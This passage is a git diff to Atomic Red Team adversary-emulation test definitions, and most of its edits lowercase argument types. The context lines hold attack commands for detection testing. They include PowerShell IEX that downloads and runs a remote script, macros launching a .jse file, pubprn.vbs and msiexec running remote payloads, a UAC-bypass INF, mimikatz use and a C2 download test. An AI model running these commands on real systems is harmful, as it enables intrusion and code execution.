"Please install xxd" executor: name: sh elevation_required: false diff --git a/atomics/T1195/T1195.yaml b/atomics/T1195/T1195.yaml index 3ec38e64..9ccd05e8 100644 --- a/atomics/T1195/T1195.yaml +++ b/atomics/T1195/T1195.yaml @@ -1,5 +1,5 @@ attack_technique: T1195 -display_name: Supply Chain Compromise +display_name: Supply Chain Compromise atomic_tests: - name: Octopus Scanner Malware Open Source Supply Chain auto_generated_guid: 82a9f001-94c5-495e-9ed5-f530dbded5e2 @@ -12,7 +12,7 @@ atomic_tests: input_arguments: rat_payload: description: RAT dropper ExplorerSync.db - type: Path + type: path default: $env:TEMP\ExplorerSync.db dependency_executor_name: powershell dependencies: diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 004bc970..70fa8ff8 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md local_file: description: Local file path to save downloaded file - type: Path + type: path default: '%temp%\bitsadmin1_flag.ps1' executor: command: | @@ -35,11 +35,11 @@ atomic_tests: input_arguments: remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md local_file: description: Local file path to save downloaded file - type: Path + type: path default: $env:TEMP\bitsadmin2_flag.ps1 executor: command: | @@ -59,19 +59,19 @@ atomic_tests: input_arguments: command_path: description: Path of command to execute - type: Path + type: path default: C:\Windows\system32\notepad.exe bits_job_name: description: Name of BITS job - type: String + type: string default: AtomicBITS local_file: description: Local file path to save downloaded file - type: Path + type: path default: '%temp%\bitsadmin3_flag.ps1' remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md executor: command: | @@ -96,19 +96,19 @@ atomic_tests: input_arguments: remote_file: description: Remote file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md download_path: description: Local file path to save downloaded file - type: Path + type: path default: 'SYSTEMROOT=C:\Windows\Temp' cleanup_path: description: path to delete file as part of cleanup_command - type: Path + type: path default: C:\Windows\Temp\Personalization\LockScreenImage cleanup_file: description: file to remove as part of cleanup_command - type: String + type: string default: "*.md" executor: command: | diff --git a/atomics/T1202/T1202.yaml b/atomics/T1202/T1202.yaml index b3597f6d..79bf2947 100644 --- a/atomics/T1202/T1202.yaml +++ b/atomics/T1202/T1202.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: payload_path: description: Path to payload - type: Path + type: path default: C:\Windows\System32\calc.exe process: description: Process to execute - type: String + type: string default: calc.exe executor: command: | @@ -35,7 +35,7 @@ atomic_tests: input_arguments: process: description: Process to execute - type: String + type: string default: calc.exe executor: command: | @@ -52,7 +52,7 @@ atomic_tests: input_arguments: process: description: Process to execute - type: String + type: string default: notepad.exe executor: command: | diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 4b721a6e..31b531bb 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -15,11 +15,11 @@ atomic_tests: jse_path: description: | Path for the macro to write out the "malicious" .jse file - type: String + type: string default: C:\Users\Public\art.jse ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -52,11 +52,11 @@ atomic_tests: input_arguments: script_file: description: File to execute jscript code from - type: Path + type: path default: '%TEMP%\OSTapGet.js' file_url: description: URL to retrieve file from - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt executor: command: | @@ -75,7 +75,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -107,11 +107,11 @@ atomic_tests: input_arguments: jse_path: description: jse file to execute with wscript - type: Path + type: path default: C:\Users\Public\art.jse ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -133,7 +133,7 @@ atomic_tests: $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell - + - name: Office launching .bat file from AppData auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. @@ -142,11 +142,11 @@ atomic_tests: input_arguments: bat_path: description: Path to malicious .bat file - type: String + type: string default: $("$env:temp\art1204.bat") ms_product: description: Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -182,11 +182,11 @@ atomic_tests: input_arguments: download_url: description: Download URL - type: String + type: string default: "https://live.sysinternals.com/procexp.exe" uname: description: Username for pathing - type: String + type: string default: $env:Username dependency_executor_name: powershell dependencies: @@ -289,9 +289,9 @@ atomic_tests: Write-Host "You will need to install Google Chrome manually to meet this requirement" executor: command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) - Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell cleanup_command: | Stop-Process -name mshta @@ -300,15 +300,15 @@ atomic_tests: description: | The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). supported_platforms: - - windows + - windows input_arguments: pua_url: description: url to PotentiallyUnwanted.exe - type: Url + type: url default: "http://amtso.eicar.org/PotentiallyUnwanted.exe" pua_file: description: path to PotentiallyUnwanted.exe - type: Path + type: path default: "$env:TEMP/PotentiallyUnwanted.exe" executor: name: powershell @@ -328,55 +328,55 @@ atomic_tests: Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt supported_platforms: - - windows + - windows input_arguments: macro_path: description: | Location of file which will be converted to a VBA macro - type: Path + type: path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: | This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. - type: Url - default: null + type: url + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. Will default to root directory. Forward slashes are not needed at begining or ending of directory path - type: Path + type: path default: "" file_name: description: | "Malicious" file to be downloaded. This required file needs to be place on the user provided c2 domain Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt - type: String + type: string default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt ms_product: description: | Maldoc application Word or Excel - type: String + type: string default: Word dependency_executor_name: powershell dependencies: - - description: | - Destination c2_domain name or IP address must be set to a running HTTP server. - prereq_command: | - if (#{c2_domain}) (exit 0) else (exit 1) - get_prereq_command: | - Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" - - description: | - Microsoftt #{ms_product} must be installed - prereq_command: | - try { - New-Object -COMObject "#{ms_product}.Application" | Out-Null - $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} - Stop-Process -Name $process - exit 0 - } catch { exit 1 } - get_prereq_command: | - Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" + - description: | + Destination c2_domain name or IP address must be set to a running HTTP server. + prereq_command: | + if (#{c2_domain}) (exit 0) else (exit 1) + get_prereq_command: | + Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" + - description: | + Microsoftt #{ms_product} must be installed + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: name: powershell command: | @@ -390,11 +390,9 @@ atomic_tests: Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore - name: LNK Payload Download auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f - description: - This lnk files invokes powershell to download putty from the internet and opens the file. - https://twitter.com/ankit_anubhav/status/1518932941090410496 + description: This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496 supported_platforms: - - windows + - windows executor: command: | Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk" @@ -422,4 +420,3 @@ atomic_tests: & '.\Excel 2016.lnk' PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f name: powershell - diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index d49c8a0d..b78285c7 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -19,23 +19,23 @@ atomic_tests: input_arguments: object: description: Targeted object (for machine account do not forget to add final '$') - type: String + type: string default: bruce.wayne attribute: description: "Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory..." - type: String + type: string default: badpwdcount value: description: Value to assign to object attribute - type: String + type: string default: "9999" mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' psexec_path: description: Path to PsExec - type: Path + type: path default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1216.001/T1216.001.yaml b/atomics/T1216.001/T1216.001.yaml index af9bc27a..f70a930c 100644 --- a/atomics/T1216.001/T1216.001.yaml +++ b/atomics/T1216.001/T1216.001.yaml @@ -10,9 +10,9 @@ atomic_tests: input_arguments: remote_payload: description: A remote payload to execute using PubPrn.vbs. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct executor: command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index e49267ef..de6e89a9 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: command_to_execute: description: A PowerShell command to execute. - type: String + type: string default: Start-Process calc executor: command: | @@ -26,7 +26,7 @@ atomic_tests: input_arguments: command_to_execute: description: A command to execute. - type: Path + type: path default: '%windir%\System32\calc.exe' executor: command: | diff --git a/atomics/T1217/T1217.yaml b/atomics/T1217/T1217.yaml index 22caf8ad..b74cb047 100644 --- a/atomics/T1217/T1217.yaml +++ b/atomics/T1217/T1217.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217-Firefox.txt executor: command: | @@ -28,7 +28,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217_Firefox.txt executor: command: | @@ -46,7 +46,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217-Chrome.txt executor: command: | @@ -106,7 +106,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed. - type: Path + type: path default: /tmp/T1217-Safari.txt executor: command: | diff --git a/atomics/T1218.001/T1218.001.yaml b/atomics/T1218.001/T1218.001.yaml index 20f22fb7..77bf8342 100644 --- a/atomics/T1218.001/T1218.001.yaml +++ b/atomics/T1218.001/T1218.001.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: local_chm_file: description: Local .chm payload - type: Path + type: path default: PathToAtomicsFolder\T1218.001\src\T1218.001.chm dependency_executor_name: powershell dependencies: @@ -36,7 +36,7 @@ atomic_tests: input_arguments: remote_chm_file: description: Remote .chm payload - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm executor: command: | @@ -50,11 +50,11 @@ atomic_tests: input_arguments: chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -75,15 +75,15 @@ atomic_tests: input_arguments: hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe infotech_storage_handler: description: Default InfoTech Storage Protocol Handler - type: String + type: string default: its chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -104,7 +104,7 @@ atomic_tests: input_arguments: chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -125,23 +125,23 @@ atomic_tests: input_arguments: topic_extension: description: Default Help Topic - type: String + type: string default: html hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe infotech_storage_handler: description: Default InfoTech Storage Protocol Handler - type: String + type: string default: its script_engine: description: Default Script Engine - type: String + type: string default: JScript chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -162,11 +162,11 @@ atomic_tests: input_arguments: topic_extension: description: Default Help Topic - type: String + type: string default: html hh_file_path: description: path of modified HH.exe - type: Path + type: path default: $env:windir\hh.exe infotech_storage_handler: description: Default InfoTech Storage Protocol Handler @@ -174,7 +174,7 @@ atomic_tests: default: its chm_file_path: description: Default path of CHM - type: String + type: string default: Test.chm dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. @@ -198,7 +198,7 @@ atomic_tests: input_arguments: local_chm_file: description: Local .chm payload - type: Path + type: path default: PathToAtomicsFolder\T1218.001\src\T1218.001.chm dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.002/T1218.002.yaml b/atomics/T1218.002/T1218.002.yaml index e14a165e..dd6ef98a 100644 --- a/atomics/T1218.002/T1218.002.yaml +++ b/atomics/T1218.002/T1218.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: cpl_file_path: description: path to cpl file - type: Path + type: path default: PathToAtomicsFolder\T1218.002\bin\calc.cpl dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.003/T1218.003.yaml b/atomics/T1218.003/T1218.003.yaml index dc1073e9..666fc62c 100644 --- a/atomics/T1218.003/T1218.003.yaml +++ b/atomics/T1218.003/T1218.003.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: inf_file_path: description: Path to the INF file - type: Path + type: path default: PathToAtomicsFolder\T1218.003\src\T1218.003.inf dependency_executor_name: powershell dependencies: @@ -34,7 +34,7 @@ atomic_tests: input_arguments: inf_file_uac: description: Path to the INF file - type: Path + type: path default: PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.004/T1218.004.yaml b/atomics/T1218.004/T1218.004.yaml index 385f92f0..5eb49d42 100644 --- a/atomics/T1218.004/T1218.004.yaml +++ b/atomics/T1218.004/T1218.004.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: CheckIfInstallable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -75,19 +75,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: InstallHelper assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -140,19 +140,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -205,19 +205,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -270,19 +270,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -335,19 +335,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -400,19 +400,19 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 assembly_dir: description: directory to drop the compiled installer assembly - type: Path + type: path default: $Env:TEMP\ invocation_method: description: the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable - type: String + type: string default: Executable assembly_filename: description: filename of the compiled installer assembly - type: String + type: string default: T1218.004.dll dependencies: - description: | @@ -466,7 +466,7 @@ atomic_tests: input_arguments: test_harness: description: location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly - type: Path + type: path default: PathToAtomicsFolder\T1218.004\src\InstallUtilTestHarness.ps1 dependencies: - description: | @@ -516,4 +516,3 @@ atomic_tests: Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallState" -ErrorAction Ignore Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore name: powershell - diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 6290efdd..a9c7b9d0 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: file_url: description: location of the payload - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct executor: command: | @@ -37,11 +37,11 @@ atomic_tests: input_arguments: temp_file: description: temp_file location for hta - type: String + type: string default: $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta hta_url: description: URL to HTA file for execution - type: String + type: string default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta executor: command: | @@ -61,15 +61,15 @@ atomic_tests: input_arguments: script_engine: description: Script Engine to use - type: String + type: string default: JScript hta_file_path: description: HTA file name and or path to be used - type: String + type: string default: Test.hta mshta_file_path: description: Location of mshta.exe - type: String + type: string default: $env:windir\system32\mshta.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -90,11 +90,11 @@ atomic_tests: input_arguments: script_engine: description: Script Engine to use - type: String + type: string default: JScript hta_file_path: description: HTA file name and or path to be used - type: String + type: string default: Test.hta dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -115,11 +115,11 @@ atomic_tests: input_arguments: mshta_file_path: description: Location of mshta.exe - type: String + type: string default: $env:windir\system32\mshta.exe hta_uri: description: URI to HTA - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -140,15 +140,15 @@ atomic_tests: input_arguments: rundll32_file_path: description: Location of rundll32.exe - type: Path + type: path default: $env:windir\system32\rundll32.exe script_engine: description: Script Engine to use - type: String + type: string default: JScript protocol_handler: description: Protocol Handler to use - type: String + type: string default: About dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -169,15 +169,15 @@ atomic_tests: input_arguments: mshta_file_path: description: Location of mshta.exe - type: Path + type: path default: $env:windir\system32\mshta.exe script_engine: description: Script Engine to use - type: String + type: string default: JScript protocol_handler: description: Protocol Handler to use - type: String + type: string default: About dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -198,7 +198,7 @@ atomic_tests: input_arguments: mshta_file_path: description: Location of mshta.exe - type: String + type: string default: $env:windir\system32\mshta.exe dependencies: - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. @@ -220,11 +220,11 @@ atomic_tests: input_arguments: message: description: Encoded message to include - type: String + type: string default: Hello,%20MSHTA! seconds_to_sleep: description: How many seconds to sleep/wait - type: Integer + type: integer default: 5 executor: command: | diff --git a/atomics/T1218.007/T1218.007.yaml b/atomics/T1218.007/T1218.007.yaml index 63cdd37a..90b0d815 100644 --- a/atomics/T1218.007/T1218.007.yaml +++ b/atomics/T1218.007/T1218.007.yaml @@ -10,16 +10,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -43,16 +43,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -76,16 +76,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -109,16 +109,16 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. - type: String + type: string default: i dependency_executor_name: powershell dependencies: @@ -142,12 +142,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -171,12 +171,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -200,12 +200,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_DLL.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -229,12 +229,12 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\T1218.007_EXE.msi action: description: | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. - type: String + type: string default: Install dependency_executor_name: powershell dependencies: @@ -258,11 +258,11 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute that has an implemented DllRegisterServer function - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: @@ -286,11 +286,11 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute that has an implemented DllUnregisterServer function - type: Path + type: path default: PathToAtomicsFolder\T1218.007\bin\MSIRunner.dll msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: @@ -314,13 +314,13 @@ atomic_tests: input_arguments: msi_payload: description: MSI file to execute - type: String + type: string default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi msi_exe: description: MSIExec File Path - type: Path + type: path default: c:\windows\system32\msiexec.exe executor: command: | #{msi_exe} /q /i "#{msi_payload}" - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1218.008/T1218.008.yaml b/atomics/T1218.008/T1218.008.yaml index 662ff057..c96a91d1 100644 --- a/atomics/T1218.008/T1218.008.yaml +++ b/atomics/T1218.008/T1218.008.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: dll_payload: description: DLL to execute - type: Path + type: path default: PathToAtomicsFolder\T1218.008\src\Win32\T1218-2.dll dependency_executor_name: powershell dependencies: @@ -35,11 +35,11 @@ atomic_tests: input_arguments: rsp_file_name: description: Response file name to load - type: String + type: string default: T1218.008.rsp rsp_file_path: description: Response file path - type: String + type: string default: PathToAtomicsFolder\T1218.008\bin\ dependency_executor_name: powershell dependencies: diff --git a/atomics/T1218.009/T1218.009.yaml b/atomics/T1218.009/T1218.009.yaml index 6c6789b6..9c9b43d4 100644 --- a/atomics/T1218.009/T1218.009.yaml +++ b/atomics/T1218.009/T1218.009.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: output_file: description: Location of the payload - type: Path + type: path default: '%tmp%\T1218.009.dll' source_file: description: Location of the CSharp source_file - type: Path + type: path default: PathToAtomicsFolder\T1218.009\src\T1218.009.cs dependency_executor_name: powershell dependencies: @@ -42,11 +42,11 @@ atomic_tests: input_arguments: output_file: description: Location of the payload - type: Path + type: path default: $Env:TEMP\T1218.009.dll source_file: description: Location of the CSharp source_file - type: Path + type: path default: PathToAtomicsFolder\T1218.009\src\T1218.009.cs dependency_executor_name: powershell dependencies: @@ -71,4 +71,3 @@ atomic_tests: Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null name: powershell elevation_required: true - diff --git a/atomics/T1218.010/T1218.010.yaml b/atomics/T1218.010/T1218.010.yaml index 4aeaaf1d..0d28540a 100644 --- a/atomics/T1218.010/T1218.010.yaml +++ b/atomics/T1218.010/T1218.010.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: filename: description: Name of the local file, include path. - type: Path + type: path default: 